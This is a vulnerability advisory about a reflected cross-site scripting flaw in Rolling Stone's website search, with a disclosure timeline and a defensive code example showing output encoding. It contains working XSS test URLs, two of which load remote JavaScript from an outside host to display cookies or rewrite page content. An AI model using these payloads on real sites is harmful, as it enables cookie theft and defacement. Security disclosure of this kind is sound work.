Rollingstone.com suffers from a cross-site scripting vulnerability. As of 12/23/2012, the author noted to Packet Storm that Rolling Stone has addressed the issue.
----------------------------------------------------------------------------------------------------
Title : Rollingstone.com reflected Cross Site Scripting (XSS) vulnerability
Vendor : Wenner Media (http://www.jannswenner.com/)
Description : The Rollingstone.com website is vulnerable to reflected cross-site scripting attacks

Advisory time-line
----------------------------------------------------------------------------------------------------
- Vendor notified : 26-30 October and 6-8 November - no responses
- Packet Storm advisory : 15-Nov-2012

Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser

Details
----------------------------------------------------------------------------------------------------
Affected functionality: site search
Test #1: Remote JavaScript execution: display browser cookie
http://www.rollingstone.com/search?q=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&x=0&y=0
Test #2: Remote JavaScript execution: overwrite HTML content
http://www.rollingstone.com/search?q=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Ffr.js%3E%3C%2FSCRIPT%3E&x=0&y=0
Test #3: Simple alert
http://www.rollingstone.com/search?q=%22%3E%3CSCRIPT%3Eprompt%28%2FXSS%2F%29%3C%2FSCRIPT%3E
Note: the test cases are not malicious.
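
All three test URLs begin the q parameter with %22%3E, which decodes to ">. The sketch below is an added example, not code from this advisory or from Rolling Stone. It assumes the search term was echoed into a double-quoted attribute; the <input> template and all function names are hypothetical. It decodes Test #3 and renders it with and without output encoding, plus a small reflection check usable as a regression test.

```javascript
// Added example. The markup template is an assumption: the advisory does not
// show the site's HTML, only that the search parameter "q" was reflected.
const TEST3_URL =
  "http://www.rollingstone.com/search?q=%22%3E%3CSCRIPT%3Eprompt%28%2FXSS%2F%29%3C%2FSCRIPT%3E";

// Extract and URL-decode the search term exactly as a server framework would.
function searchTerm(url) {
  return new URL(url).searchParams.get("q") ?? "";
}

// Before: the term is interpolated raw, so a leading "> closes the attribute
// and the tag, and whatever follows is parsed as new markup.
function renderVulnerable(q) {
  return `<input type="text" name="q" value="${q}">`;
}

// HTML-encode the five characters that are significant in element and
// quoted-attribute contexts.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// After: same template, but the term is encoded at the point of output.
function renderHardened(q) {
  return `<input type="text" name="q" value="${escapeHtml(q)}">`;
}

// Regression check: a term containing HTML metacharacters must never appear
// verbatim in the response body.
function reflectsUnescaped(html, term) {
  return /[<>"'&]/.test(term) && html.includes(term);
}

const q = searchTerm(TEST3_URL);
console.log("decoded term :", q);
console.log("vulnerable   :", renderVulnerable(q), "->", reflectsUnescaped(renderVulnerable(q), q));
console.log("hardened     :", renderHardened(q), "->", reflectsUnescaped(renderHardened(q), q));
```

Encoding at output fixes this attribute context only; other reflection points (script blocks, URLs, unquoted attributes) need their own context-specific encoding.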

Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg
Project site: http://idash.net
Twitter: https://twitter.com/JanneFI
----------------------------------------------------------------------------------------------------